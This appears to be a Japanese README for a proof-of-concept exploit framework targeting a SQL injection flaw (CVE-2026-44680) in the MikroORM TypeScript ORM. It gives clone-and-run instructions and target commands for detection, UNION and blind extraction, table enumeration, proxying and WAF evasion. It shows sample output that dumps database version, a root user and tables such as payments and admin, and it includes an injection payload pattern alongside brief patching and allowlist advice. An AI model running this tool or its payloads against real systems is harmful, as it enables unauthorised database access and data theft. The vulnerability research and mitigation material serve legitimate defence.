
CVE-2026-44680 の PoC ツール。MikroORM ≤7.0.13 に影響します。JSON パスインジェクションを悪用し、UNION ベースの攻撃によりデータベースの内容を抽出します。脆弱性検出、自動データ抽出、テーブル列挙、ブラインド注入サポートを備えています。Burp Suite 用のプロキシ統合と WAF 回避テクニックを含みます。
セキュリティ研究者向けプロフェッショナルなProof-of-Conceptツール
CVE-2026-44680 は、Node.js向けの人気TypeScript ORMであるMikroORMに影響を及ぼす重大なSQLインジェクション脆弱性です。このエクスプロイトフレームワークは、セキュリティ研究者やペネトレーションテスターに、脆弱性を検出および悪用するためのプロフェッショナルなツールを提供します。
作者: Sudeepa Wanigarathna
バージョン: 1.0.0
分類: プロフェッショナルなセキュリティ研究ツール
| 属性 | 値 |
|---|---|
| CVE ID | CVE-2026-44680 |
| CVSSスコア | 7.6(高) |
| 攻撃ベクトル | ネットワーク |
| 攻撃の複雑さ | 低 |
| 必要な権限 | 低 |
@mikro-orm/knex <= 6.6.13@mikro-orm/sql <= 7.0.13MikroORMは、JSON_EXTRACT クエリを構築する際に、実行時に制御されるJSONパスキーを適切にエスケープできません。攻撃者はJSONパスコンテキストから脱出し、任意のSQLコードを注入することができます。
# Python 3.8 or higher
python3 --version
# pip package manager
pip --version
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit
# Using requirements.txt
pip install -r requirements.txt
# Or install manually
pip install requests colorama tqdm urllib3 simplejson
python exploit.py --help
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0
# Full exploitation
python exploit.py -u http://localhost:3000
# Vulnerability detection only
python exploit.py -u http://target.com --detect
# Extract database information
python exploit.py -u http://target.com --extract
# Enumerate tables
python exploit.py -u http://target.com --enumerate
python exploit.py -u http://192.168.1.100:3000
python exploit.py -u http://target.com -e /api/v2/users/query
python exploit.py -u http://target.com -p http://127.0.0.1:8080
python exploit.py -u http://target.com -v --extract
python exploit.py -u http://target.com --blind
python exploit.py -u http://target.com --detect
python exploit.py -u http://target.com --extract
python exploit.py -u http://target.com --enumerate
============================================================
MikroORM CVE-2026-44680 Exploitation Framework
Author: Sudeepa Wanigarathna
============================================================
[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection
[+] Vulnerability confirmed!
[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin
===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000
[*] VULNERABILITY DETAILS
- CVE: CVE-2026-44680
- CVSS Score: 7.6 (High)
- Affected Components: @mikro-orm/knex <= 6.6.13
[*] DATABASE INFORMATION
- Version: 10.11.6-MariaDB
- Database: production_db
- User: root@localhost
- Hostname: localhost
[*] ENUMERATED TABLES (5 found)
1. users
2. products
3. orders
4. payments
5. admin
[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt
exploit_report_1742493645.txt # Complete exploitation report
tables_1742493645.txt # List of discovered tables
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];
function validateJsonPath(key) {
if (!ALLOWED_JSON_PATHS.includes(key)) {
throw new Error('Invalid JSON path');
}
return key;
}
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "
重要: このツールは、許可されたセキュリティテストおよび教育目的のみで使用してください。
このプロジェクトは MITライセンス の下でライセンスされています。
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...
セキュリティ研究コミュニティのために ❤️ を込めて作られました
| 機能 | 説明 | ステータス |
|---|
| 脆弱性検出 | 時間ベースおよびエラーベースの検出 | ✅ |
| データベース抽出 | バージョン、データベース、ユーザー、ホスト名 | ✅ |
| テーブル列挙 | 全テーブルの自動発見 | ✅ |
| UNIONベースの注入 | UNION SELECTによるデータ抽出 | ✅ |
| ブラインド注入 | ブールベースの文字抽出 | ✅ |
| プロキシサポート | Burp Suite / インターセプトプロキシ | ✅ |
| レポート生成 | プロフェッショナルなTXTレポート | ✅ |
| WAF回避 | 高度な難読化技術 | ✅ |
| フラグ | 説明 | デフォルト |
|---|
-u, --url | ターゲットURL(必須) | - |
-e, --endpoint | APIエンドポイント | /api/users/search |
-p, --proxy | HTTPプロキシ | None |
-v, --verbose | 詳細出力 | False |
--detect | 脆弱性の検出のみ実行 | False |
--extract | データベース情報の抽出 | False |
--enumerate | テーブルの列挙 | False |
--blind | ブラインド注入モード | False |